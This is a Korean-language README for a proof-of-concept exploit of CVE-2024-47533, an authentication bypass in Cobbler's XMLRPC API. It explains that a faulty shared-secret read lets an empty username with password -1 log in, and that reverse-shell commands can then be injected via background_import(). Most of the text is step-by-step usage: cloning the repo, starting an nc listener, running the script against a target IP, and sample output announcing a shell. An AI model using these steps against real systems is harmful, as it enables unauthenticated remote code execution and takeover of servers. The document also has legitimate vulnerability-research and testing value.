
CVE-2024-47533에 대한 개념 증명 익스플로잇. Cobbler의 XMLRPC API에서 인증 우회를 통해 인증되지 않은 원격 코드 실행 및 리버스 셸을 가능하게 합니다.
이 저장소는 CVE-2024-47533에 대한 개념 증명(PoC) 익스플로잇을 포함하고 있습니다.
이는 Cobbler의 XMLRPC API에서 발생하는 심각한 인증 우회 취약점으로, **인증되지 않은 원격 코드 실행(RCE)**으로 이어집니다.
이 익스플로잇은 XMLRPC API의 login() 메서드 결함을 이용하여 인증을 우회하고, background_import()를 통해 리버스 셸 명령어를 주입합니다.
이 도구는 교육, 연구 및 승인된 침투 테스트 목적으로만 사용됩니다.
소유하지 않거나 명시적인 서면 허가 없이 시스템에 사용하지 마십시오.
저자는 오용 또는 손해에 대해 책임을 지지 않습니다.
근본 원인:
utils.get_shared_secret()는 바이너리 모드에서 인코딩으로 파일 읽기를 잘못 처리하여 -1을 잘못 반환하며, 이로 인해 빈 사용자 이름과 -1을 비밀번호로 사용한 인증이 허용됩니다.
영향:
공격자는 다음을 수행할 수 있습니다:
git clone https://github.com/00xCanelo/CVE-2024-47533-PoC.git
cd CVE-2024-47533-PoC
공격자 머신에서:
nc -lvnp 4444
python3 CVE-2024-47533.py -u http://<TARGET_IP>:<PORT>/RPC2 -l <LHOST> -p <LPORT>
예시:
python3 CVE-2024-47533.py -u http://192.168.1.50:25151/RPC2 -l 192.168.1.100 -p 4444
.
├── CVE-2024-47533.py # 리버스 셸 익스플로잇 스크립트
└── README.md # 문서
[*] Target: http://192.168.1.50:25151/RPC2
[*] Listener: 192.168.1.100:4444
[*] Payload: bash
[*] Connecting to Cobbler...
[*] Authenticating...
[*] Executing exploit...
[+] Exploit sent! Got A Shell 🔥.
00xCanelo
GitHub Profile